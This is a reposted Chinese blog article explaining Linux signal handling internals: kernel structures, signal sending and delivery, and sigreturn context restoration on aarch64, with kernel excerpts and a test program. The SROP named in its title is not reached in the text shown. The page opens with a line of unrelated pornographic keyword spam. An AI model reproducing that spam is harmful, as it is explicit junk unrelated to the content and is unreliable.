久久精品国产精品国产精品污,男人扒开添女人下部免费视频,一级国产69式性姿势免费视频,夜鲁夜鲁很鲁在线视频 视频,欧美丰满少妇一区二区三区,国产偷国产偷亚洲高清人乐享,中文 在线 日韩 亚洲 欧美,熟妇人妻无乱码中文字幕真矢织江,一区二区三区人妻制服国产

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > linux >内容正文

linux

linux中的信号处理与SROP

發布時間:2023/12/20 linux 23 豆豆
生活随笔 收集整理的這篇文章主要介紹了 linux中的信号处理与SROP 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

版權聲明:本文為CSDN博主「ashimida@」的原創文章,遵循CC 4.0 BY-SA版權協議,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/lidan113lidan/article/details/122547854

更多內容可關注微信公眾號??

一、基本概念

? 信號是事件發生時對進程的通知機制,其與中斷類似,在到達時都會打斷程序的正常執行流程。一個進程(若具有權限則)可以向另一個進程或向自身發送信號,其可以作為一種同步技術或進程間通信的原始形式。發往進程的諸多信號通常都源于內核,引發內核為進程產生信號的事件包括:

  • 硬件異常: 如用戶態的訪問異常/除零異常等,其首先都是由硬件捕獲并通知內核的,再由內核通過信號傳遞給用戶態。
  • 用戶輸入的中斷字符: 如ctrl-c, ctrl-z。
  • 軟件事件的發生: 如針對文件描述符的輸出變為有效,終端大小調整,定時器到期,cpu執行時間到期,子進程退出等。

每個信號在系統中都有唯一的編碼,其編號隨著系統的不同而不同,故程序中應該總是使用符號名來代表這些信號。

信號分為標準信號和實時信號, 在linux中編號1~31為標準信號 >31(<=64)的為實時信號

信號在產生后可能會經歷一段時間才會真正被處理(到達),在此過程中信號則處于pending(等待狀態), 在內核返回用戶態時才會檢查信號是否到來,故:

* 若進程向其他進程發送信號,則通常總要有一段(極短的)pending的時間, 直到目標進程被調度到或目標進程正在運行時產生了el0異常.

* 若進程向自身發送信號,則通常在如*kill系統調用返回時此信號立即被處理。

有時為了確保一段代碼不被打斷,可以通過掩碼來屏蔽部分信號,被屏蔽的信號會一直處于等待狀態,直到接觸屏蔽

通過/proc/pid/status接口可以查看當前進程的信號:

## 實現代碼參考內核 ./fs/proc/array.c task_sig tangyuan@ubuntu:~/tests/namespace$ cat /proc/xxx/status ...... SigQ: 1/31451 ## 當前進程信號隊列中總共收到了多少個信號 SigPnd: 0000000000000000 ## 當前線程收到過哪些信號,SigPnd(signal pending)是收到的信號掩碼 ShdPnd: 0000000000000200 ## 當前*線程組*共享隊列中收到了哪些信號, ShdPnd(shared pending)是共享隊列中收到的掩碼,這里0x200代表收到信號為SIGUSR1 SigBlk: 0000000000000a00 ## 當前線程阻塞的信號掩碼,當前SIGUSR1/2信號均被阻塞 SigIgn: 0000000000000000 ## 當前*線程組*忽略的信號,信號忽略是以線程組為單位的 SigCgt: 0000000000000a00 ## 當前*線程組* 捕獲的信號,也就是自定義了信號處理函數的信號,當前SIGUSR1/2均自定義了信號處理函數 ......

linux中各信號的定義可參考[0], 這里需要注意的是:

1. 標準信號不排隊,實時信號需排隊處理

  • 標準信號不做排隊處理:? 即內核某線程/線程組若收到某個標準信號,則在其被處理前是不會再次在pending隊列中加入同一個標準信號的。這意味著若一個標準信號多次到達,其信號處理函數有可能只被調用了一次
  • 實時信號需要排隊處理:? ?即內核某線程/線程組若收到實時信號,則不論之前是否有收到過此信號,都會在pending隊列新增此信號。這也意味著每發生一次實時信號其信號處理函數都會被調用一次

?2. 內核線程也可以接收信號

? ?雖然信號處理是為用戶進程設計的,但在linux中內核線程也是可以接受信號的。和用戶進程不同的是:

  • 內核線程中只可以確定要接受哪個信號,但不能為信號指定具體處理函數
  • 內核線程不會主動觸發信號處理函數,若想要查看自身收到的信號,內核線程中需要使用循環來判斷自身是否收到了信號(默認的信號處理發生在內核返回到用戶態,內核線程不會觸發此流程)
  • 內核線程可以指定其接受的某個信號只能由內核態發出,即其可以指定自身不接受用戶態發送的信號。
  • 內核線程不接受SIGKILL信號

內核線程的信號處理可以參考內核線程函數 jffs2_garbage_collect_thread.

?3. init進程不接受SIGKILL/SIGSTOP信號

? ?見內核sig_task_ignored函數

二、信號處理函數的設置

? 從內核角度看,一個線程的信號可能保存在兩個隊列中:

  • 一個是線程組共享的信號隊列(task_struct->signal->shared_pending)
  • 一個是線程自身私有的信號隊列(task_struct->pending)

? 通常信號是發送到線程組共享的信號隊列的,此隊列中的信號被線程組中的任意線程處理(一次)即可,而在用戶態看來則是一個信號可能被線程組中的任一線程處理。而通過如tkill系統調用也可以將信號直接發送給線程的私有信號隊列,此時雖然線程組中所有線程的信號處理函數是同一個,但可以確保此信號只會由某個具體的線程來處理。在內核中信號相關的結構體定義如下:

// task_struct中信號相關字段 struct task_struct {....../* Signal handlers: */struct signal_struct *signal; /* 指向線程組共享的信號描述信息的指針 */struct sighand_struct __rcu *sighand; /* 指向線程組共享的信號處理函數描述信息的指針 *//*線程私有的被阻塞信號結構體, sigset_t是一個信號掩碼, 每個信號在其中占一個bit位,需要注意block和ignore不同:* 被設置為ignore后再接收到此信號則會被直接忽略,設置時若發現有已到達的ignore信號也會丟棄。* 被設置為blocked后再接收到此信號同樣還需要加入到信號隊列,只是此時不再向縣城發送TFI_SIGPENDING到達信號了,后續unblock之后此信號還是會被處理的.*/sigset_t blocked; sigset_t real_blocked;sigset_t saved_sigmask; /* 在sigsuspend等函數等待信號期間臨時保存之前的 block 掩碼 */struct sigpending pending; /* 線程私有的信號隊列 */unsigned long sas_ss_sp; /* 若線程有單獨的信號棧則記錄在這里 */size_t sas_ss_size;unsigned int sas_ss_flags;...... }//只記錄部分相關結構體 struct signal_struct {......struct list_head thread_head; /* 指向線程組組長的task_struct->thread_node */......struct sigpending shared_pending; /* 線程組的共享信號隊列 *//* thread group exit support */int group_exit_code; /* 整個線程組是因為哪個信號退出的,見 complete_signal */int group_stop_count; /* thread group stop support, overloads group_exit_code too */unsigned int flags; /* see SIGNAL_* flags below */struct pid *pids[PIDTYPE_MAX]; /* 信號處理時有時會向進程組,會話發送信號,這里記錄進程組和會話pid等相關信息 */...... }struct sighand_struct {spinlock_t siglock; refcount_t count; /* 引用計數 */wait_queue_head_t signalfd_wqh; /* 等待此signal 的signalfd 隊列,見 signalfd_read */struct k_sigaction action[_NSIG]; /* 記錄每個信號的信號處理函數等相關信息 */ };struct k_sigaction {struct sigaction sa;...... };struct sigaction {/* 信號處理函數指針,* 若為0(SIG_DFL)則代表使用默認信號處理函數* 若為1(SIG_IGN)則代表此信號被忽略* 若為2(SIG_KTHREAD)則代表當前內核線程可以接受用戶態/內核態向其發送此信號* 若為3(SIG_KTHREAD_KERNEL)則代表當前內核線程只可以接受內核態向其發送此信號*/__sighandler_t sa_handler;unsigned long sa_flags; /* 某些信號會有一些細節控制flag,如SIGCHLD可以指定SA_NOCLDSTOP */sigset_t sa_mask; /* 當當前信號正在處理時需屏蔽的其他信號,其可以用于防止信號處理函數被再次中斷 */ };

? 各結構體關系如下圖:

? linux 用戶態可以通過signal/sigaction函數設置信號處理函數,二者系統調用接口如下:

SYSCALL_DEFINE3(sigaction, int, sig, const struct old_sigaction __user *, act, struct old_sigaction __user *, oact); SYSCALL_DEFINE2(signal, int, sig, __sighandler_t, handler);

??二者最終均調用了do_sigaction函數,這里以簡單的sys_signal函數為例:

/* 將當前線程組信號sig的處理函數設置為handler, 并返回舊的信號處理函數指針 */ SYSCALL_DEFINE2(signal, int, sig, __sighandler_t, handler) {struct k_sigaction new_sa, old_sa;int ret;new_sa.sa.sa_handler = handler; /* 構建一個 sigaction結構體并指定用戶態的信號處理函數 handler */new_sa.sa.sa_flags = SA_ONESHOT | SA_NOMASK; /* signal 函數默認是單次觸發 */sigemptyset(&new_sa.sa.sa_mask); /* 清空/重置當前信號處理時的掩碼 */ret = do_sigaction(sig, &new_sa, &old_sa); /* 設置當前線程組信號sig的處理函數,并返回此信號舊的處理函數指針; 若信號設置為被忽略則需刪除已收到的所有此信號 */return ret ? ret : (unsigned long)old_sa.sa.sa_handler; /* 出錯返回錯誤碼,否則返回原有的handler */ }

? do_sigaction:

/*此函數負責為當前線程組設置信號sig的信號處理函數(記錄在act中),并通過oact返回之前的信號處理函數.如果act中指定信號sig會被忽略,那么會刪除此線程組信號隊列(包括線程組所有線程私有信號隊列)中已經接受到的此信號. */ int do_sigaction(int sig, struct k_sigaction *act, struct k_sigaction *oact) {struct task_struct *p = current, *t;struct k_sigaction *k;sigset_t mask;/* 若非有效信號([1,64]之外的信號),或是不可屏蔽信號則返回錯誤。不可屏蔽信號(SIG_KILL/SIG_STOP)不能設置handler */if (!valid_signal(sig) || sig < 1 || (act && sig_kernel_only(sig)))return -EINVAL;k = &p->sighand->action[sig-1]; /* 獲取當前線程組中此信號的 action 數組 */if (oact) /* 如果需要獲取舊的信號處理信息,則通過oact 返回 */*oact = *k;.......if (act) {/* 傳入的sa_mask為此信號處理函數執行過程中需要屏蔽的其他信號, SIGKILL/SIGSTOP總是不可屏蔽信號,需要去除 */sigdelsetmask(&act->sa.sa_mask, sigmask(SIGKILL) | sigmask(SIGSTOP));*k = *act; /* 將新的action結構體復制到線程組此信號的action結構體中, 信號處理函數設置完畢 *//*如果當前信號被設置為要忽略(此信號handler設置為SIG_IGN,或設置為SIG_DFL且此信號默認行為是忽略), 則需要同時刪除此線程所在線程組中所有信號隊列中已經收到的所有此信號. 這包括線程組的shared_pending和各個線程自身的pending隊列中:* 已經加入隊列的信號結構體(sigqueue)的刪除* 清除這些隊列自身sigpending->signal中此sig的掩碼*/if (sig_handler_ignored(sig_handler(p, sig), sig)) {sigemptyset(&mask); /* 生成此信號對應的掩碼 */sigaddset(&mask, sig);flush_sigqueue_mask(&mask, &p->signal->shared_pending); /* 刪除shared_pending中已有的所有此信號 */for_each_thread(p, t) flush_sigqueue_mask(&mask, &t->pending); /* 同時刪除線程組各個線程中的此信號 */}}return 0; }

三、信號的發送

? 這里以用戶態入口系統調用sys_kill為例,其定義如下:

SYSCALL_DEFINE2(kill, pid_t, pid, int, sig) {struct kernel_siginfo info;/* 為signal 準備 kernel_siginfo 結構體*/prepare_kill_siginfo(sig, &info);return kill_something_info(sig, &info, pid); }static int kill_something_info(int sig, struct kernel_siginfo *info, pid_t pid) {int ret;if (pid > 0)return kill_proc_info(sig, info, pid); /* 若pid > 0 ,則向此pid對應的線程組發送信號 */......return ret; } //這里以pid>0為例,kill_proc_info函數會依次調用到 _send_signal處理信號,在此過程中會調用check_kill_permission檢查發送權限 //kill_proc_info => kill_pid_info => group_send_sig_info => do_send_sig_info => send_signal /*sig: 要發送的信號t: 信號要發送到哪個tasktype: 信號是否要同時發給此task所在的線程組/進程組/會話,若為PIDTYPE_PID則代表信號只發給當前task(線程)force: 若信號來自內核或祖先namespace,則force為true */ static int __send_signal(int sig, struct kernel_siginfo *info, struct task_struct *t,enum pid_type type, bool force) {struct sigpending *pending;struct sigqueue *q;int ret = 0, result;....../* 若當前信號是線程組要忽略的信號,則這里直接返回; 此函數中還預處理了stop/continue信號的關系 */if (!prepare_signal(sig, t, force)) goto ret;/*若信號是發給特定線程的(type=PIDTYPE_PID),則使用t->pending(當前線程的pending隊列)若信號是發給線程組/會話的,則使用shared_pending(共享的存儲pending的隊列)*/pending = (type != PIDTYPE_PID) ? &t->signal->shared_pending : &t->pending;....../* 非ignore的信號也不一定總是要插入信號隊列:* 對于非實時信號,如果pending隊列中已有此信號則不必重復添加,直接返回* 對于實時信號和未曾添加過的信號,則向隊列中添加此信號*/if (legacy_queue(pending, sig))goto ret;......if ((sig == SIGKILL) || (t->flags & PF_KTHREAD)) /* 不可向內核線程發送SIGKILL信號 */goto out_set;......q = __sigqueue_alloc(sig, t, GFP_ATOMIC, override_rlimit, 0); /* 分配存儲此信號信息的 sigqueue 結構體 */if (q) {list_add_tail(&q->list, &pending->list); /* 將信號添加到 sigpending隊列的末尾 */......} else ......out_set:signalfd_notify(t, sig); /* 支持signalfs的信號通知鏈 */sigaddset(&pending->signal, sig); /* 將信號加入pending隊列的信號掩碼中,此掩碼用來快速判斷當前隊列收到了哪些信號 */if (type > PIDTYPE_TGID) { /* 如果此信號是發送到信號組或session的 */.......}complete_signal(sig, t, type); /* 若信號沒有被block等情況下, 為當前線程標記 TIF_SIGPENDING */ ret:......return ret; }

? 其中prepare_signal定義如下:

static bool prepare_signal(int sig, struct task_struct *p, bool force) {struct signal_struct *signal = p->signal;struct task_struct *t;sigset_t flush;if (signal->flags & (SIGNAL_GROUP_EXIT | SIGNAL_GROUP_COREDUMP)) { /* 如果線程組正在退出過程中, 則此信號變為 SIGKILL */if (!(signal->flags & SIGNAL_GROUP_EXIT))return sig == SIGKILL;} else if (sig_kernel_stop(sig)) { /* 如果線程收到stop信號,則移除已有的所有continue信號 */.......} else if (sig == SIGCONT) { /* 若收到continue信號則喚醒線程 */ .......}return !sig_ignored(p, sig, force); /* 如果此信號不被忽略,則返回true */ }static bool sig_ignored(struct task_struct *t, int sig, bool force) {/*若線程已經設置了此信號的blocked掩碼,則說明此信號只是被block了,不能忽略此時不會判斷handler是否為SIG_IGN.*/if (sigismember(&t->blocked, sig) || sigismember(&t->real_blocked, sig))return false;.......return sig_task_ignored(t, sig, force); }static bool sig_task_ignored(struct task_struct *t, int sig, bool force) {void __user *handler;handler = sig_handler(t, sig); /* 獲取信號handler *//* SIGKILL/SIGSTOP不能發送給全局init進程 */if (unlikely(is_global_init(t) && sig_kernel_only(sig)))return true;......./* 若向內核線程發送信號時此內核線程指定了SIG_KTHREAD_KERNEL,則只有內核可向其發送信號 */if (unlikely((t->flags & PF_KTHREAD) &&(handler == SIG_KTHREAD_KERNEL) && !force))return true;/* handler為SIG_IGN;或為SIG_DFL但默認處理方式為ignore的信號直接忽略 */return sig_handler_ignored(handler, sig); }

? 其中complete_signal函數定義如下:

static void complete_signal(int sig, struct task_struct *p, enum pid_type type) {struct signal_struct *signal = p->signal;struct task_struct *t;if (wants_signal(sig, p)) /* 此函數返回true(即此線程希望收到信號),則后續需要為線程p標記p->flags|=TIF_SIGPENDING */t = p;/* 若當前線程暫時不想收到信號, 且此信號只能此線程接收(包括兩種情況:1)此信號就是發送給當前線程的; 2) 其線程組中沒有其他線程;則此時不設置 TIF_SIGPENDING 直接返回 */else if ((type == PIDTYPE_PID) || thread_group_empty(p))return;else { /* 否則找到線程組中一個可以處理此信號的線程并向其發送信號 */t = signal->curr_target;while (!wants_signal(sig, t)) {t = next_thread(t);if (t == signal->curr_target)return;}signal->curr_target = t;}......signal_wake_up(t, sig == SIGKILL); /* 為線程t標記 TIF_SIGPENDING */return; }static inline bool wants_signal(int sig, struct task_struct *p) {if (sigismember(&p->blocked, sig)) /* 若task p block了信號sig,則此時無需為其設置 TIF_SIGPENDING */return false;if (p->flags & PF_EXITING) /* 若當前進程正在退出,則不再需要signal */return false;if (sig == SIGKILL) /* SIGKILL信號總是無法block(在設置信號時會確保blocked掩碼中未屏蔽SIGKILL/SIGSTOP */return true;if (task_is_stopped_or_traced(p))return false;return task_curr(p) || !task_sigpending(p); /* 已有TIF_SIGPENDING的進程無需重新設置 */ }static inline void signal_wake_up(struct task_struct *t, bool resume) {signal_wake_up_state(t, resume ? TASK_WAKEKILL : 0); }void signal_wake_up_state(struct task_struct *t, unsigned int state) {/* 標記線程t中有信號需要處理 */set_tsk_thread_flag(t, TIF_SIGPENDING);/* 喚醒線程t */if (!wake_up_state(t, state | TASK_INTERRUPTIBLE))kick_process(t); }

四、信號的處理與等待

4.1 信號處理概述

1. 信號處理的時機

? 由前可知,信號發送操作除了將具體信號設置到線程的共享/私有隊列外,還會為此線程標記TIF_SIGPENDING flags(若當前線程block了信號,則有可能會發送給線程組其他線程), 不論線程收到了多少個信號都會通過這一個flag標記, 只要線程的tsk->flags 標記了 TIF_SIGPENDING則就說明此線程收到了信號

? 內核在檢查是否有信號到達時同樣檢查的也是線程的TIF_SIGPENDING flag, 內核中的信號處理可以分為兩種場景:

?1) 內核返回用戶態時檢查并處理信號

? ? 由于信號在多大多數情況下是給用戶態進程使用的,故比較常見的是此場景, 通常從EL0異常入口進入內核并返回到用戶態之前都會檢查當前線程是否有要處理的信號,如:

  • EL0同步異常, 如EL0發起的系統調用, 指令/數據訪問錯誤.
  • EL0異步異常, 如EL0時發生的IRQ中斷.

? 2) 內核線程通過循環檢查自身的信號

????這種場景比較少見, 偶爾出現在一些需要與用戶態交互的內核線程中, 此時內核線程可以決定只接受內核發送的信號(SIG_KTHREAD_KERNEL),也可以接受用戶態信號(SIG_KTHREAD). 和用戶態顯著的區別在于, 內核信號更類似一個個case,其不能指定信號處理函數,內核線程中需要自己實現代碼來循環檢測是否有信號出現(內核線程不會執行到1的流程,故若收到信號必須主動處理) 在情景1/2中內核均通過類似signal_pending的邏輯判斷當前線程是否有需要處理的信號.

2、信號處理流程描述

內核在返回用戶態之前檢查并處理信號, 當前線程首先會無視(不忽略也不處理)其自身阻塞的信號,對于未被阻塞的信號分為三種情況:

?1) 使用默認行為的信號(SIG_DFL)

  • 如果默認行為是忽略此信號,則內核直接忽略此信號
  • 如果默認行為是終止/停止/繼續,則內核直接處理

?2) 直接忽略的信號(SIG_IGN)

  • 內核直接忽略標記為忽略的信號

?3) 需要執行handler的信號

  • 內核需要在信號棧保存當前用戶態上下文,并為用戶態重置一個信號上下文
  • 內核返回用戶態后執行信號上下文(即信號處理函數), 執行完畢后通過ret指令返回
  • 信號上下文會直接返回到系統調用 sys_rt_sigreturn, 此系統調用中恢復之前的用戶態上下文
  • 內核再次返回用戶態,恢復用戶態上下文執行

需要注意的是:

1) 阻塞是以線程為單位的:?

? ? 線程組共享的信號(常規信號)被一個線程阻塞并不代表其不能被處理, 同一線程組的任一其他線程均可處理此信號。

2) 用戶態上下文:

? ? 用戶態代碼執行到任意位置時都有可能有異常觸發, 不論是同步/異步異常在返回時都會檢查當前進程是否有信號要處理, 對于需要執行信號處理函數的信號其被中斷前的用戶態上下文必須得以保存,否則信號處理函數執行完畢后無法恢復原有運行環境. 在linux中此用戶態上下文是被在異常發生時存儲,在信號處理函數執行的過程中被保存在用戶/信號棧中的,在信號處理完畢后同樣需要從棧中恢復。

3) 信號上下文:

? ? 信號上下文指的是信號處理函數的上下文,主要包括:

  • PC: 即信號處理函數的指針
  • SP: 信號處理函數可以使用當前用戶線程的棧,也可以單獨指定一個信號棧(后面以線程棧為例); 內核在執行信號處理函數前會在棧上保存用戶上下文以便執行完畢后的恢復
  • LR: 信號處理函數也是一個普通函數, 其通過ret指令返回,內核則需要讓信號處理函數返回時執行 sys_rt_sigreturn來恢復用用戶態上下文, 故內核需要將信號處理函數的返回地址設置為sys_rt_sigreturn函數地址.

4)?當異常返回前發現多個信號處理函數時:

? ? 異常返回前會循環遍歷所有未被當前線程block的信號,如果有多個信號均需要執行信號處理函數, 那么內核會在進程棧中依次堆疊多個信號棧幀, 如某線程依次收到了需要執行handler的 sig1/sig2兩個信號, 則內核會先為sig1設置棧幀,然后為sig2設置棧幀。而最終用戶態的執行流程是 sig2_handler => sys_rt_sigreturn => sig1_handler => sys_rt_sigreturn => 用戶態上下文, 即后到的信號被優先處理(舉例見備注)。

5) 當信號處理函數執行過程中再次被信號中斷時:

? ? 若用戶態正在執行信號處理函數,此時沒有被當前線程block的信號可能導致此信號處理程序被再次中斷,同樣是后到的信號被優先處理,但不同的是此時可能導致競態死鎖問題(信號處理函數需要設計為可重入).

6) 安全性分析:

? ? 這里的安全性分析僅針信號處理過程中是否會導致權限提升,并不針對如SROP等利用信號處理的利用方式。信號處理的過程中在用戶棧中保存了用戶態上下文,在信號處理完成后需要內核(sys_rt_sigreturn)為用戶態恢復此上下文,用戶態上下文的數據包括:

struct ucontext {unsigned long uc_flags;struct ucontext *uc_link;stack_t uc_stack; sigset_t uc_sigmask; /* 重置的block掩碼 */__u8 __unused[1024 / 8 - sizeof(sigset_t)];struct sigcontext uc_mcontext; };struct sigcontext {__u64 fault_address;__u64 regs[31]; /* 通用寄存器 */__u64 sp;__u64 pc;__u64 pstate; /* pstate 狀態寄存器 */__u8 __reserved[4096]; /* 4K reserved for FP/SIMD state and future expansion */ };

? 用戶態跳轉到/修改任何用戶態數據均不會有權限問題,其中唯一的問題就是內核在信號返回時會從用戶態讀取pstate并恢復到內核的CPSR_EL1; pstate中記錄了一些需要恢復的如比較j結果,是否溢出等,但同時也記錄了一些安全相關的如當前異常級別等bit位,故如果不加檢查的直接從用戶態恢復此值則攻擊者可以輕易利用信號處理來提升異常級別(如用戶態由EL0=>EL1), 內核處理的方式則是恢復用戶態上下文之前添加了一個檢查函數valid_user_regs,以確保pstate的正確性,代碼如下:

int valid_user_regs(struct user_pt_regs *regs, struct task_struct *task) {user_regs_reset_single_step(regs, task); /* 若需要則重置單步調試 */if (is_compat_thread(task_thread_info(task)))return valid_compat_regs(regs);elsereturn valid_native_regs(regs); /* pstate必須設置為EL0, 開啟所有中斷, aarch64模式才有效 */ }static int valid_native_regs(struct user_pt_regs *regs) {regs->pstate &= ~SPSR_EL1_AARCH64_RES0_BITS; /* pstate 中reserved bit 直接置零 *//** user_mode 要求 pstate最后4bit為必須為 0x0 (也就是返回到用戶態必須是EL0)* 64位不能返回到aarch32;* 且當前的異常掩碼必須全部置零(開中斷)*/if (user_mode(regs) && !(regs->pstate & PSR_MODE32_BIT) &&(regs->pstate & PSR_D_BIT) == 0 &&(regs->pstate & PSR_A_BIT) == 0 &&(regs->pstate & PSR_I_BIT) == 0 &&(regs->pstate & PSR_F_BIT) == 0) {return 1;}/* Force PSR to a valid 64-bit EL0t */regs->pstate &= PSR_N_BIT | PSR_Z_BIT | PSR_C_BIT | PSR_V_BIT;return 0; }

3、信號處理舉例

? 測試代碼:

/* 此代碼針對aarch64平臺, 其他平臺由于ucontext結構體定義不同編譯不通過 */ #include <asm/ucontext.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <errno.h> #include <signal.h> #include <fcntl.h>void siguser2_handler(int signo, siginfo_t *info, void *ctx) {struct ucontext *uc = ctx;unsigned long *fp = __builtin_frame_address(0);unsigned long *lr = __builtin_return_address(0);printf("[+][siguser2]: current fp:%p, lr:%p\n", fp, lr);printf("[+][siguser2]: ucontext:%p, size:%x\n", uc, sizeof(struct ucontext));printf("[+][siguser2]: prev context: pc:%p, sp:%p, lr:%p\n", \uc->uc_mcontext.pc, uc->uc_mcontext.sp, uc->uc_mcontext.regs[30]);return; }void siguser1_handler(int signo, siginfo_t *info, void *ctx) {struct ucontext *uc = ctx;unsigned long *fp = __builtin_frame_address(0);unsigned long *lr = __builtin_return_address(0);printf("[+][siguser1]: current fp:%p, lr:%p\n", fp, lr);printf("[+][siguser1]: ucontext:%p, size:%x\n", uc, sizeof(struct ucontext));printf("[+][siguser1]: prev context: pc:%p, sp:%p, lr:%p\n", \uc->uc_mcontext.pc, uc->uc_mcontext.sp, uc->uc_mcontext.regs[30]);return; }int main() {struct sigaction act;sigset_t set, oldset;printf("[+] current pid:%d, setting siguser1_handler:%p, siguser2_handler:%p ...\n", \getpid(), siguser1_handler, siguser2_handler);act.sa_sigaction = siguser1_handler; act.sa_flags = SA_SIGINFO;sigemptyset(&act.sa_mask);sigaction(SIGUSR1, &act, NULL);act.sa_sigaction = siguser2_handler;sigaction(SIGUSR2, &act, NULL); /* 設置SIGUSER1/SIGUSER2的handler */printf("[+] setting mask for SIGUSR1/2 ...\n");sigemptyset(&set);sigemptyset(&oldset);sigaddset(&set, SIGUSR1);sigaddset(&set, SIGUSR2);sigprocmask(SIG_SETMASK, &set, &oldset); /* 先block SIGUSER1/SIGUSER2 信號的處理 */printf("[+] sending signal SIGUSR1 ...\n");kill(getpid(), SIGUSR1);printf("[+] sending signal SIGUSR2 ...\n");kill(getpid(), SIGUSR2); /* 向當前進程發送SIGUSER1/SIGUSER2信號, 此時線程同時擁有兩個需要執行handler的信號 */printf("[+] unmask SIGUSR1/2 ...\n");/* unblock SIGUSER1/SIGUSER2 信號的處理 *, 此系統調用返回時處理線程的兩個信號 */sigprocmask(SIG_SETMASK, &oldset, NULL); /* 此時會先調用SIGUSER2信號處理函數, 再調用SIGUSER1信號處理函數,然后再返回main函數 */char buf1[] = "[+] runing in main\n";write(1, buf1, sizeof(buf));return 0; }

? 輸出結果:

/ # ./main [4/7606] [+] current pid:112, setting siguser1_handler:0x400838, siguser2_handler:0x4007ac ... [+] setting mask for SIGUSR1/2 ... [+] sending signal SIGUSR1 ... [+] sending signal SIGUSR2 ... [+] unmask SIGUSR1/2 ... [+][siguser2]: current fp:0xffffc46aac60, lr:0xffff9c2b6888 ## siguser2返回地址為 sys_rt_sigreturn [+][siguser2]: ucontext:0xffffc46aad30, size:11d0 [+][siguser2]: prev context: pc:0x400838, sp:0xffffc46abf10, lr:0xffff9c2b6888 ## siguser2上一個棧幀pc為siguser1_handler,其一句都尚未執行## siguser1的返回地址也是 sys_rt_sigreturn [+][siguser1]: current fp:0xffffc46abec0, lr:0xffff9c2b6888 ## siguser1的返回地址為 sys_rt_sigreturn(同上) [+][siguser1]: ucontext:0xffffc46abf90, size:11d0 [+][siguser1]: prev context: pc:0x413b8c, sp:0xffffc46ad170, lr:0x4056cc ## siguser1上一個棧幀為系統調用的下一條指令(__pthread_sigmask中svc的下一條指令)## siguser1上一個棧幀的返回地址即為__pthread_sigmask的返回地址(__sigprocmask函數中的地址) [+] runing in main## 進程映射 00400000-0047a000 r-xp 00000000 00:02 5 /main 0048a000-0048b000 r--p 0007a000 00:02 5 /main 0048b000-0048d000 rw-p 0007b000 00:02 5 /main 0048d000-00496000 rw-p 00000000 00:00 0 25b2e000-25b50000 rw-p 00000000 00:00 0 [heap] ffff9c2b4000-ffff9c2b6000 r--p 00000000 00:00 0 [vvar] ffff9c2b6000-ffff9c2b7000 r-xp 00000000 00:00 0 [vdso] ffffc468d000-ffffc46ae000 rw-p 00000000 00:00 0 [stack]

? 整個信號處理的代碼執行流程如下圖所示:

4.2 EL0異常返回前的中斷檢查與處理

? EL0中不論是同步/異步異常,最終均會調用函數 exit_to_user_mode返回用戶態, 此函數中負責檢查當前線程是否有需要處理的信號,定義如下:

static __always_inline void exit_to_user_mode(struct pt_regs *regs) {prepare_exit_to_user_mode(regs); /* 關中斷, 檢查返回到用戶態之前是否有未完成的工作 */mte_check_tfsr_exit();__exit_to_user_mode(); }static __always_inline void prepare_exit_to_user_mode(struct pt_regs *regs) {unsigned long flags;local_daif_mask(); /* 關中斷 */flags = READ_ONCE(current_thread_info()->flags); /* 獲取當前線程的flag,檢查是否有等待處理的工作 */if (unlikely(flags & _TIF_WORK_MASK)) /* 如果有未完成的工作,則調用 do_nitify_resume處理 */do_notify_resume(regs, flags); }/*do_notify_resume 函數用來處理線程返回前被通知的未完成的工作,此函數直到處理完所有工作后才返回, 包括 進程調度,信號處理等.這里需要注意的是,若當前線程中有多個信號需要處理,那么do_notify_resume會為每個信號都調用do_signal函數,直到所有信號處理后才返回。故在用戶態角度其在執行某個信號處理函數時可能發現棧幀還堆疊著多個其他待執行的信號處理函數。 */ void do_notify_resume(struct pt_regs *regs, unsigned long thread_flags) {do {if (thread_flags & _TIF_NEED_RESCHED) {local_daif_restore(DAIF_PROCCTX_NOIRQ); /* 如果是需要調度,則先關中斷 */schedule();} else {local_daif_restore(DAIF_PROCCTX); /* 非調度則開中斷即可 */.......if (thread_flags & (_TIF_SIGPENDING | _TIF_NOTIFY_SIGNAL)) /* do_signal函數一次處理一個信號, 系統調用的restart也在這里處理 */do_signal(regs);.......}local_daif_mask(); /* 關中斷 */thread_flags = READ_ONCE(current_thread_info()->flags); /* 再次檢查是否還有未完成的工作 */} while (thread_flags & _TIF_WORK_MASK); /* 如果還有未完成工作,則循環處理 */ }

??其中do_signal是信號處理的入口,此函數一次處理一個信號,其定義如下:

/*此函數只在內核返回用戶態時被嗲用, regs是內核棧上的指針。在EL0異常發生時, 異常入口(keren_ventry/kernel_entry)會將用戶態當前寄存器狀態保存到此regs中,同時異常返回時此regs會重新賦值給用戶態運行環境,即此regs的修改會導致用戶態控制流等變化。 */ static void do_signal(struct pt_regs *regs) {unsigned long continue_addr = 0, restart_addr = 0;int retval = 0;struct ksignal ksig;bool syscall = in_syscall(regs); /* 根據pt_regs->syscallno判斷當前用戶態是否是通過系統調用進入的異常 *//* 系統調用返回的ERESTART* 系列返回值是需要在這里處理的 */if (syscall) { /* 對于系統調用,則需要檢查其返回值(R0)是否代表此系統調用要重新執行,若是則修正pc */continue_addr = regs->pc;restart_addr = continue_addr - (compat_thumb_mode(regs) ? 2 : 4);retval = regs->regs[0]; /* 獲取syscall返回值,系統調用的返回值在 invoke_syscall 的最終已經放到regs->regs[0]中了 */forget_syscall(regs); /* Avoid additional syscall restarting via ret_to_user. *//*系統調用時若返回類似 ERESTARTSYS 則都需要先為此線程設置信號, 以確保可以走到此流程此時需要里需要恢復進入syscall之前的x0 以供restart使用, 并同時重置pc為restart之前的那一條指令.*/switch (retval) {case -ERESTARTNOHAND:case -ERESTARTSYS:case -ERESTARTNOINTR:case -ERESTART_RESTARTBLOCK:regs->regs[0] = regs->orig_x0;regs->pc = restart_addr;break;}}/* 從線程的pending/shared_pending隊列中查找信號,對于SIG_DFL的直接處理掉,SIG_IGN的信號直接忽略,若發現一個信號需要執行handler則立即返回,不再處理剩余信號.此函數返回true則代表找到一個要執行的handler,返回false代表所有信號均處理完畢,沒有需要執行的handler.*/if (get_signal(&ksig)) { ....../* 若發現一個信號需要執行信號處理函數,則調用此函數:* 將當前用戶態上下文保存到用戶態棧/用戶態信號棧* 將用戶態上下文設置為信號處理(pc=handler/sp=sp+x;lr=__kernel_rt_sigreturn ...)*/handle_signal(&ksig, regs);return;}...... }

